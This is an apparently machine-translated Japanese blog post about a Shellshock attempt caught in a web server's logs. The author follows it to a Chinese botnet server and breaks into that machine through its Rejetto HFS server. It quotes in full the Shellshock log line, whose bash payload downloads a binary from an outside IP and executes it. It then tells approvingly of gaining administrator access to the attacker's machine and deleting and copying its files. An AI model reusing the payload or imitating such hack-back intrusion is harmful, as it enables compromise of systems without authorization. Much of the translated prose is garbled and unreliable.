私が想像するように、KDPVはボットネットオペレーターの可能性を表しています。
技術的な詳細は最小限で、ほとんどが不細工です。 どういたしまして
ボット
それはすべて標準的な方法で始まり、悪いことは何もありませんでした-土曜日の夜に、私はWebサーバー上のオーバーフロー/ var / logをきれいにすることにしました。 このサーバーの仕様により、セクションのオーバーフローのように、サーバー上のログは重要ではありません。 さて、監視はより頻繁に書き込みを開始するかもしれませんが、新しいイベントは分析されません。 クリーニングプロセス中、ボットはまだ頑固に壊れてsshのルートパスワードを選択し、入れ子になった希望を満たすPCPを見つけようとしますが、スキャンする意味がないものを定期的にスキャンしていることが判明しました。 一言で言えば沈黙と恵み。 目がログの奇妙に大きなクエリに固執しない限り:
1.2.3.4 - - [20/Mar/2015:18:39:36 +0000] "GET / HTTP/1.1" 200 14932 "() { :; }; /bin/bash -c \x22rm -rf /tmp/*;echo wget http://61.160.xy:911/x26 -O /tmp/China.Z-bdzm >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chmod 777 /tmp/China.Z-bdzm >> /tmp/Run.sh;echo /tmp/China.Z-bdzm >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh\x22" "() { :; }; /bin/bash -c \x22rm -rf /tmp/*;echo wget http://61.160.xy:911/x26 -O /tmp/China.Z-bdzm >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chmod 777 /tmp/China.Z-bdzm >> /tmp/Run.sh;echo /tmp/China.Z-bdzm >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh\x22"
これがshellshockです。 「echo By China.Z」への別の呼び出しとしての著者の強制的な言及は、特に感動的に見え、ダウンロードして実行することになっていたものを見ることができました。
ボットサーバー
httpsによると、サーバーはオープンで活発であることが判明し、あらゆる場面で素晴らしいファイルのリストを作成しました。
tempディレクトリとadmユーザーを見てはいけません。スクリーンショットを撮ろうとすぐには思いませんでした。 最初はディレクトリがありませんでした。ユーザーの代わりにログインすることが提案されました。 サーバーのアップタイムとヒット数、またはたとえばファイルをよく見て、ウイルス対策ソフトウェアが見ているように。 もちろん、内部には多くの興味深いものがあります-さまざまな方法でそれを行うことができ、(あなたとは異なり、中央銀行:-)鉱山し、広げることができます(不適切ですが)が、このトピックは逆ではありません。 文字列に数十のコンパイル済みIPv4アドレスがリストされていることだけが注目に値します。そのほとんどは中国のものです。
素晴らしいRejetto HFSサーバー
正直なところ、私は彼に出会ったことは一度もありません。彼が下のページで彼の存在をそれほど強く宣言していなかったなら、私は興味を失うことなくこのサイトを去っていただろう。 しかし、これはやるべき運命ではなかった。 サーバーは素晴らしいことが判明しました。 引用:
ファイル操作
負荷| A
あなたはこれを好きになるでしょう。 Aをファイル名またはURLとして指定できます。 ロードされて展開されます。
ハハ、神はいまいましい!
さらに、このバージョンは「技術的な穴」であるだけでなく、単純なnetcatを使用してこの素晴らしい機能をすべて使用できるだけでなく、非常に怠peopleな人々のための既製のモジュールを使用できるようになりました。 そのため、最初はユーザーadmが単純な実行を開始し、tempディレクトリをC:\ドライブのルートにマッピングすることにより、jail(またはWindowsでアナログと呼ばれるもの)からログアウトしました。 夢はすぐに覆われ、好奇心がpre延しました。
覗き見のために、中国のボットマスターと潜在的なビットコインの億万長者の典型的な環境のいくつかの写真(鉱夫のリストから判断してください):
ドライブC:\
ディスクD:\
プログラムファイル:
ディスクD:\
プログラムファイル:
目立ったものはなく、少なくとも少しでもアクセスを妨げるようなものはありません。 そしてもちろん、ボーナスはすべてが管理者アカウントで機能することでした。 マイナスの-非常に低速。 中国のファイアウォールのメリットなのか、忙しいマシンなのかを調査しませんでしたが、キャッチは毎秒数百キロビットに制限され、ピークはメガビットまででした。 はい、すべて中国語で書かれているため、研究が非常に複雑になり、Google翻訳による反復が必要になります。
キャッチ
- 楽しいtm用のさまざまなバイナリ。
- 感染したマシンの1500個のアドレス(ウイルスのダウンロード数から判断すると、もっとあるはずですが、ファイルがクリーンアップされたか、ヒットではなく一意ではないと見なされました)。 ほとんどの中国は虐待によって出荷されました。
- 150のアドレスがグループに分けられています-鉱夫、ローダー、さらにはある種の問題です。 甘いままにしました。
- ステルス忍者になったり、トロイの木馬やボットボットドライバーを植えたりすることもできますが、遅すぎて面倒くさく、率直に言って同志少佐にはそのようなスキルすらありません。 したがって、無音モードは尊重されず、サーバーは削除/コピー/ファイルをきしむ/きしむ音を立てました。 そして、その結果、接続が中断され、母語が中国語でほとんど聞こえる感覚は貴重です。
品質は何でもない、すべてがルルザ 
キャプテンOモーメント
- 管理者の下に座らないでください。
- 管理者の下でWebサービスを実行しないでください。
- ソフトウェアを最新の状態に保つ
- 自宅のPCでボットネットセンターを実行しないでください。
- 定期的に住所を変更します。
- ボットネットがない場合でもファイアウォールを設定します。
- すべてのトリッキーなお尻には、あります! (c)
私たちは、最後の段落を固く信じており、パスワードを使わずにルートアクセスを提供し続けます。
楽しんでいただけましたでしょうか。 誰かが教育的ニーズのために何かを必要とするなら、個人で書いてください。